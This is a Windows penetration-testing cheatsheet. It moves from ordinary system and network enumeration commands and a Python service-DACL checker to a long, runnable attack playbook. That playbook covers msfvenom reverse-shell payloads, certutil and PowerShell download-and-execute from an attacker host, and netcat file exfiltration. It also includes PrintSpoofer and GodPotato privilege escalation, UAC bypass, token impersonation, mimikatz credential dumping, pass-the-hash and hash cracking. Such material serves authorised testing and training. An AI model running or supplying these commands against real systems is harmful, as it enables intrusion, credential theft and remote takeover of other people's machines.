Cheatsheet
Win Enumeration
System Information Commands
Operating System and Version:
systeminfo # Displays detailed system information
ver # Displays Windows version
winver # Displays Windows version and build number
msinfo32 # Opens System Information tool
wmic os get name,version,buildnumber # Retrieves OS version/build info
Hardware Information:
getmac /v # Displays MAC address
hostname # Displays computer name
Environment Variables:
set # Lists all environment variables
echo %PATH% # Prints a specific environment variable
path # Displays or modifies the PATH environment variable
File System and Directory Management
Navigation and Directory Structure:
cd # Change current directory
dir # List files and directories
tree # Graphical view of directory structure
File Operations:
type NUL > file.txt # Create a new file
echo "text" > file.txt # Write text into a file
type file.txt # Display file contents
del file.txt # Delete a file
copy file1 file2 # Copy files
move file1 folder/ # Move files
ren oldname new_name # Rename files
Directory Operations:
mkdir new_folder # Create a directory
rd folder_name # Remove a directory
Networking Commands
Network Information:
ipconfig /all # Displays all network interfaces
netstat -ano # Shows network connections and listening ports
route print # Displays the routing table
netsh wlan show profiles # Shows Wi-Fi profiles
Testing and Troubleshooting:
ping google.com # Test connectivity
tracert microsoft.com # Trace route to a destination
nslookup google.com # DNS queries
Permissions and User Management
User Information:
whoami # Displays current user
whoami /groups # Lists user groups
whoami /priv # Shows user privileges
net user # Lists all users
net user <USERNAME> # Displays user details
net localgroup Administrators # Lists members of the local Administrators group
Permissions and Policies:
icacls file.txt # Displays file permissions
net accounts # Displays account policies
gpupdate /force # Updates Group Policy settings
gpresult /r # Displays Group Policy results
Process and Service Management
Process Management:
tasklist # Lists running processes
taskkill /IM process.exe /F # Terminates processes
Service Management:
net start "ServiceName" # Starts a service
sc.exe start <SERVICE> # Starts a service
net stop "ServiceName" # Stops a service
sc.exe stop <SERVICE> # Stops a service
sc query # Queries Windows services
sc.exe qc <SERVICE> # Checks service configuration
Get-Service # PowerShell alternative for service details
sc.exe config <SERVICE> binPath= "C:\Path\to\malicious.exe" # Changes the binary path of a service (sc.exe requires the space after "binPath=")
sc.exe sdshow <SERVICE> # Checks service permissions (prints the SDDL)
sc.exe sdset <SERVICE> <SDDL> # Updates service permissions
.\accesschk64.exe /accepteula -uwcqv SimpleService # Verify service permissions
ConvertFrom-SddlString -Sddl <SDDL> # Convert SDDL to readable format
wmic process list full | Select-String 'executablepath=C:' | Select-String -NotMatch 'system32|syswow' # Get executable path for all processes
x86_64-w64-mingw32-gcc -mwindows -municode -O2 -s -o simpleService.exe simpleService.c # Compiling a custom service
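To make sense of the SDDL that sc.exe sdshow returns when ConvertFrom-SddlString is not at hand, here is an added Python example (not part of the original cheatsheet) that parses a service DACL and flags allow ACEs granting change-config, delete, or take-ownership rights to low-privilege well-known trustees, which is the misconfiguration accesschk -uwcqv reports. Both SDDL strings are constructed samples: the first mirrors the documented default service DACL, the second grants Authenticated Users full control; the right abbreviations are the standard service-specific ones.

```python
import re

# Service-specific right abbreviations as printed by `sc.exe sdshow` / accepted by `sc.exe sdset`.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG", "LC": "SERVICE_QUERY_STATUS",
    "SW": "SERVICE_ENUMERATE_DEPENDENTS", "RP": "SERVICE_START", "WP": "SERVICE_STOP",
    "DT": "SERVICE_PAUSE_CONTINUE", "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GW": "GENERIC_WRITE", "GR": "GENERIC_READ", "GX": "GENERIC_EXECUTE",
}
# Rights that let a principal change the binary the service runs, delete it, or take over its DACL.
DANGEROUS = {"DC", "SD", "WD", "WO", "GA", "GW"}
# Well-known low-privilege trustees that should only hold query/start/stop style rights.
LOW_PRIV_SIDS = {"AU": "Authenticated Users", "BU": "Users", "WD": "Everyone",
                 "IU": "Interactive", "AN": "Anonymous"}
# ACE syntax: (type;flags;rights;object_guid;inherit_guid;sid)
ACE_RE = re.compile(r"\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)")

# Constructed samples (not taken from a real host). The first mirrors the documented default
# service DACL; the second additionally grants Authenticated Users full control.
DEFAULT_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
WEAK_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)")


def parse_dacl(sddl: str):
    """Yield (ace_type, set_of_right_abbrevs, trustee) for each ACE in the D: part only."""
    dacl = sddl.split("S:", 1)[0]          # drop the SACL (audit) part if present
    for ace_type, _flags, rights, _og, _ig, sid in ACE_RE.findall(dacl):
        if rights.startswith("0x"):       # raw hex access mask; left unmapped here
            abbrevs = {rights}
        else:
            abbrevs = {rights[i:i + 2] for i in range(0, len(rights), 2)}
        yield ace_type, abbrevs, sid


def weak_aces(sddl: str):
    """Allow-ACEs that give DANGEROUS rights to a low-privilege trustee: [(who, [rights])]."""
    findings = []
    for ace_type, rights, sid in parse_dacl(sddl):
        bad = sorted(rights & DANGEROUS)
        if ace_type == "A" and sid in LOW_PRIV_SIDS and bad:
            findings.append((LOW_PRIV_SIDS[sid], [SERVICE_RIGHTS[r] for r in bad]))
    return findings


if __name__ == "__main__":
    for name, sddl in (("default", DEFAULT_SDDL), ("weak", WEAK_SDDL)):
        print(name, weak_aces(sddl) or "no weak ACEs")
```

A hex access mask in the rights field is passed through unmapped, so audit those ACEs by hand.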
Windows System Utilities
Administrative Tools:
mmc # Opens Microsoft Management Console
eventvwr # Opens Event Viewer
services.msc # Opens Services Management Console
Performance and Disk Management:
perfmon # Opens Performance Monitor
resmon # Opens Resource Monitor
diskmgmt.msc # Opens Disk Management
cleanmgr # Opens Disk Cleanup
defrag C: # Defragments the drive
PowerShell - System, User, Process and Service
PowerShell Commands for Local Accounts:
Get-LocalUser # Lists local users
Get-LocalGroup # Lists local groups
Get-LocalGroupMember <GROUP_NAME> # Lists members of a group
System File Management:
sfc /scannow # Scans and repairs system files
chkdsk C: /f # Checks and fixes disk errors
Registry and Configuration Management:
reg query HKLM\Software # Queries the registry
msconfig # Opens System Configuration
List Environment Variables
dir env:
Search Files Recursively
Get-ChildItem -Path C:\Users\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\Users\ -Include *.txt -File -Recurse -ErrorAction SilentlyContinue
List Running Processes
Get-Process
List Installed Applications (32-bit)
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | Select-Object DisplayName
List Installed Applications (64-bit)
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | Select-Object DisplayName
Retrieve Service Information
Get-Service * | Select-Object DisplayName,Status,ServiceName,Can*
Get-CimInstance -ClassName Win32_Service | Select-Object Name,State,PathName | Where-Object {$_.State -like 'Running'}
File Transfer and Reverse Shell
Generate a reverse shell payload
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.122.1 LPORT=7777 -f exe -o malicious.exe
Using certutil
Certutil is a Windows tool that can download files:
certutil -urlcache -split -f http://attacker_ip/file.exe file.exe
Using PowerShell
PowerShell (iwr) can download files via HTTP:
Invoke-WebRequest -Uri http://attacker_ip/file.exe -OutFile file.exe
Using FTP
Windows supports FTP commands:
ftp
open <attacker_ip>
put file.txt
get file.txt
Using SMB Shares
Files can be transferred using network shares:
net use \\<attacker_ip>\share /user:username password
copy file.exe \\<attacker_ip>\share
Netcat
Set up a listener on the attacker machine:
nc -lvp 4444 > file.exe
Send the file from the target:
nc attacker_ip 4444 < file.exe
Python Simple HTTP Server
On the attacker machine:
python3 -m http.server 80
On the target machine:
certutil -urlcache -split -f http://attacker_ip/file.exe file.exe
Spawning a Reverse Shell
cmd.exe
The cmd.exe reverse shell relies on utilities like ncat.exe to establish a connection. The process involves downloading the necessary binary, setting up a listener on the attacker machine, and initiating the reverse connection from the victim machine.
Steps
Download ncat.exe on the Target Machine
ncat.exe (a lightweight implementation of Netcat) is required for creating the reverse shell.
iwr -uri "https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe" -OutFile nc64.exe
Set Up a Listener on the Attacker Machine
The attacker machine must have a listener ready to receive the reverse connection.
nc -lvnp 7777
Initiate the Reverse Shell from the Target Machine
On the victim machine, execute the following command to connect back to the attacker and spawn a shell:
C:\Users\Quickemu\Desktop\nc64.exe 192.168.122.1 7777 -e cmd
Powershell
Using the Invoke-PowerShellTcp.ps1 Script
Invoke-PowerShellTcp.ps1 is a PowerShell script designed for reverse shells.
Download the Script on the Attacker Machine
wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1
Configure the Script
Add the line to specify the attacker's IP and port:
echo "Invoke-PowerShellTcp -Reverse -IPAddress <Attacker_Machine> -Port 7777" >> Invoke-PowerShellTcp.ps1
Host the Script on an HTTP Server
Use Python to serve the script for download:
python3 -m http.server 1337
Start listening mode with Netcat on attacker machine
netcat -nvlp 7777
Execute the Script from the Target Machine
From CMD:
powershell -c "iex(new-object net.webclient).downloadstring(\"http://192.168.122.1:1337/Invoke-PowerShellTcp.ps1\")"
From PowerShell:
iex(new-object net.webclient).downloadstring("http://<Attacker_Machine>:1337/Invoke-PowerShellTcp.ps1")
Win Priv Esc
SeImpersonatePrivilege
Checking for SeImpersonatePrivilege
To verify whether the current user has this privilege, run the following:
whoami /priv
Sample Output
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeImpersonatePrivilege Impersonate a client after authentication Enabled
If SeImpersonatePrivilege is enabled, the user can exploit it for privilege escalation using tools like PrintSpoofer or GodPotato.
SeImpersonatePrivilege Privilege Escalation
Initial Setup
Start a Listener on the Attacker Machine
nc -lvnp 5555
Download Netcat on the Victim Machine
iwr -uri "https://raw.githubusercontent.com/int0x33/nc.exe/master/nc64.exe" -Outfile nc64.exe
PrintSpoofer
PrintSpoofer abuses the Print Spooler service, in combination with SeImpersonatePrivilege, to escalate privileges to SYSTEM.
Download the Exploit
iwr -uri "https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe" -Outfile PrintSpoofer64.exe
Execute the Exploit
Run the following command to establish a SYSTEM shell:
PrintSpoofer64.exe -c "C:\Users\leonardo\Desktop\nc64.exe 192.168.122.1 5555 -e cmd"
GodPotato
Identify .NET Framework Version
Use the following command to determine the .NET version installed:
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
Download the Appropriate GodPotato Version
Depending on the .NET version:
.NET 2.0:
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe" -Outfile GodPotato-NET2.exe
.NET 3.5:
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe" -Outfile GodPotato-NET35.exe
.NET 4.0:
iwr -uri "https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe" -Outfile GodPotato-NET4.exe
Execute the Exploit
Use the appropriate executable to escalate privileges and spawn a reverse shell:
.\GodPotato-NET2.exe -cmd "C:\Users\leonardo\Desktop\nc64.exe 192.168.122.1 5555 -e cmd"
winPEAS
Download the binary:
wget https://github.com/peass-ng/PEASS-ng/releases/download/20241011-2e37ba11/winPEASx64.exe
Running winPEAS to Enumerate Services
Use the servicesinfo option to gather information about services:
.\winPEASx64.exe quiet servicesinfo
Kernel
# WIN KERNEL
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LOCAL_HOST_IP> LPORT=<LOCAL_PORT> -f exe -o payload.exe
python3 -m http.server
# Download payload.exe on target
## Windows-Exploit-Suggester Install
mkdir Windows-Exploit-Suggester
cd Windows-Exploit-Suggester
wget https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/f34dcc186697ac58c54ebe1d32c7695e040d0ecb/windows-exploit-suggester.py
# ^^ This is a python3 version of the script
python ./windows-exploit-suggester.py --update
pip install xlrd --upgrade
./windows-exploit-suggester.py --database YYYY-MM-DD-mssb.xlsx --systeminfo win7sp1-systeminfo.txt
./windows-exploit-suggester.py --database YYYY-MM-DD-mssb.xlsx --systeminfo win2008r2-systeminfo.txt
## METASPLOIT
## Global set
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
use exploit/multi/handler
options
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <LOCAL_HOST_IP>
set LPORT <LOCAL_PORT>
use post/multi/recon/local_exploit_suggester
set SESSION <HANDLER_SESSION_NUMBER>
## MsfConsole Meterpreter Privesc
getprivs
getsystem
# Exploitable vulnerabilities modules
exploit/windows/local/bypassuac_dotnet_profiler
exploit/windows/local/bypassuac_eventvwr
exploit/windows/local/bypassuac_sdclt
exploit/windows/local/cve_2019_1458_wizardopium
exploit/windows/local/cve_2020_1054_drawiconex_lpe
exploit/windows/local/ms10_092_schelevator
exploit/windows/local/ms14_058_track_popup_menu
exploit/windows/local/ms15_051_client_copy_image
exploit/windows/local/ms16_014_wmi_recv_notif
UAC
# UAC - UACME
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LOCAL_HOST_IP> LPORT=<LOCAL_PORT> -f exe > backdoor.exe
## METASPLOIT - Listening
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <LOCAL_HOST_IP>
set LPORT <LOCAL_PORT>
## Meterpreter (Unprivileged session)
cd C:\\
mkdir Temp
cd Temp
upload /root/backdoor.exe
upload /root/Desktop/tools/UACME/Akagi64.exe
shell
Akagi64.exe 23 C:\Temp\backdoor.exe
akagi32.exe [Key] [Param]
akagi64.exe [Key] [Param]
## Elevated Meterpreter Received on the listening session
ps -S lsass.exe
migrate <lsass_PID>
hashdump
Access Token
# ACCESS TOKEN IMPERSONATION
## METASPLOIT - Meterpreter (Unprivileged session)
pgrep explorer
migrate <explorer_PID>
getuid
getprivs
load incognito
list_tokens -u
impersonate_token "ATTACKDEFENSE\Administrator"
getuid
getprivs # Access Denied
pgrep explorer
migrate <explorer_PID>
getprivs
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"
Windows Credential Dumping
# Exploitation
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<LOCAL_HOST_IP> LPORT=1234 -f exe > payload.exe
python -m SimpleHTTPServer 80
# Grant privilege to a user:
Add-LocalGroupMember -Group "Backup Operators" -Member "Leonardo"
# Save SAM and SYSTEM files:
reg save hklm\sam C:\Users\Leonardo\Desktop\SAM.hive
reg save hklm\system C:\Users\Leonardo\Desktop\SYSTEM.hive
## METASPLOIT
setg RHOSTS <TARGET_IP>
setg RHOST <TARGET_IP>
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST <LOCAL_HOST_IP>
set LPORT <LOCAL_PORT>
run
## On target system
certutil -urlcache -f http://<LOCAL_HOST_IP>/payload.exe payload.exe
# Run payload.exe
# METASPLOIT - Meterpreter
sysinfo
getuid
pgrep lsass
migrate <lsass_PID>
getprivs
# Creds dumping - Meterpreter
load kiwi
creds_all
lsa_dump_sam
lsa_dump_secrets
# MIMIKATZ
cd C:\\
mkdir Temp
cd Temp
upload /usr/share/windows-resources/mimikatz/x64/mimikatz.exe
shell
mimikatz.exe
privilege::debug
lsadump::sam
lsadump::secrets
sekurlsa::logonPasswords
mimikatz64.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"
# PASS THE HASH
## sekurlsa::logonPasswords
background
search psexec
use exploit/windows/smb/psexec
set LPORT <LOCAL_PORT2>
set SMBUser Administrator
set SMBPass <ADMINISTRATOR_LM:NTLM_HASH>
exploit
System Logs
Get-History # Retrieve Commands from Memory
(Get-PSReadlineOption).HistorySavePath # Retrieve History File Location
Cracking Windows Hashes
# Download rockyou.txt:
curl -L https://github.com/danielmiessler/SecLists/raw/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz | tar -xz
# LM hash:
john --format=lm --wordlist=rockyou.txt hash.txt
hashcat -m 3000 -a 3 hash.txt
# NTLM hash:
john --format=nt --wordlist=rockyou.txt hash.txt
hashcat -m 1000 -a 3 hash.txt
# Net-NTLMv1:
john --format=netntlm --wordlist=rockyou.txt hash.txt
hashcat -m 5500 -a 3 hash.txt
# Net-NTLMv2:
john --format=netntlmv2 --wordlist=rockyou.txt hash.txt
hashcat -m 5600 -a 3 hash.txt
Crackmapexec
crackmapexec smb <TARGET_IP> -u Administrator -H "<NTLM_HASH>" -x "whoami"